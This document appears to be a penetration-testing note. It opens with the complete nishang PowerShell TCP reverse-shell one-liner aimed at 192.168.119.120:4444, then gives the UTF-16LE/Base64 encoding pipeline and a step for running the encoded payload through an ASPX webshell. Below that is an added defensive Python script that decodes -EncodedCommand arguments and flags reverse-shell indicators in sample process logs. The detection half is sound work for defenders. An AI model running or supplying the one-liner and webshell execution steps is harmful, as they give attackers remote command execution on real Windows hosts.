PowerShell Reverse Shell One-Liner Command
From: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
$client = New-Object System.Net.Sockets.TCPClient('192.168.119.120',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
- Encode the PowerShell command with Base64 to avoid quoting and encoding issues
- In Kali:
iconv -f ASCII -t UTF-16LE powershellcmd.txt | base64 | tr -d "\n"
  (iconv manual: https://linux.die.net/man/1/iconv)
- PowerShell's -EncodedCommand expects the UTF-16 Little Endian encoding, which is why the command is converted with iconv before the Base64 step
- Execute in ASPX webshell
powershell.exe -EncodedCommand [payload]
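As an added defender-side example (not part of these notes and not nishang's code): the same UTF-16LE/Base64 transform run in reverse, so an analyst can decode -EncodedCommand arguments found in process-creation logs and flag the TCPClient/GetStream/iex pattern of the one-liner above. The log lines, the 192.0.2.10 address and the function names are constructed for this example.

```python
import base64
import re

# Strings from the one-liner pattern above that mark a TCP reverse shell.
# Matching is case-insensitive (PowerShell is), so 'IEX' and 'iex' both hit.
INDICATORS = (
    "System.Net.Sockets.TCPClient",
    ".GetStream()",
    "iex ",
    "Invoke-Expression",
    "$stream.Write(",
)

# -EncodedCommand and the abbreviated spellings PowerShell accepts for it,
# followed by the Base64 argument. The switch may appear anywhere in the line.
ENCODED_ARG = re.compile(
    r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]+)"
)


def encode_command(text: str) -> str:
    """Same transform as the iconv -t UTF-16LE | base64 | tr -d "\\n" pipeline."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_command(b64: str) -> str:
    """Inverse of encode_command: Base64 -> UTF-16LE bytes -> text.

    Raises ValueError (binascii.Error) on non-Base64 input or bad padding.
    """
    raw = base64.b64decode(b64, validate=True)
    return raw.decode("utf-16-le", errors="replace")


def extract_encoded_arg(cmdline: str):
    """Return the Base64 argument of -EncodedCommand, or None if absent."""
    m = ENCODED_ARG.search(cmdline)
    return m.group(1) if m else None


def analyze(cmdline: str) -> dict:
    """Decode an encoded PowerShell command line and list indicator hits."""
    b64 = extract_encoded_arg(cmdline)
    if b64 is None:
        return {"encoded": False, "decoded": None, "indicators": []}
    try:
        decoded = decode_command(b64)
    except ValueError:  # not valid Base64: encoded switch seen, but undecodable
        return {"encoded": True, "decoded": None, "indicators": []}
    lowered = decoded.lower()
    hits = [ind for ind in INDICATORS if ind.lower() in lowered]
    return {"encoded": True, "decoded": decoded, "indicators": hits}


# Constructed process-creation log lines (hypothetical, not real telemetry).
# The third one carries the opening of the one-liner shown above, pointed at
# the documentation-only address 192.0.2.10.
BENIGN_LINE = "powershell.exe -NoProfile -EncodedCommand " + encode_command("Get-Date")
SUSPECT_LINE = "powershell.exe -nop -w hidden -enc " + encode_command(
    "$client = New-Object System.Net.Sockets.TCPClient('192.0.2.10',4444);"
    "$stream = $client.GetStream();"
)
SAMPLE_LOG = [
    "notepad.exe C:\\Users\\alice\\notes.txt",
    BENIGN_LINE,
    SUSPECT_LINE,
    "powershell.exe -enc AAA",  # truncated/garbage argument, bad padding
]


def scan(lines):
    """Return (line, decoded, indicators) for every line with indicator hits."""
    findings = []
    for line in lines:
        result = analyze(line)
        if result["indicators"]:
            findings.append((line, result["decoded"], result["indicators"]))
    return findings


if __name__ == "__main__":
    for line, decoded, hits in scan(SAMPLE_LOG):
        print("ALERT:", hits)
        print("  cmdline:", line[:60] + "...")
        print("  decoded:", decoded)
```

The decoder deliberately uses errors="replace": a truncated or hand-edited payload with an odd byte count still yields readable text for the analyst instead of an exception, while a malformed Base64 argument is reported as "encoded but undecodable" rather than silently dropped.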
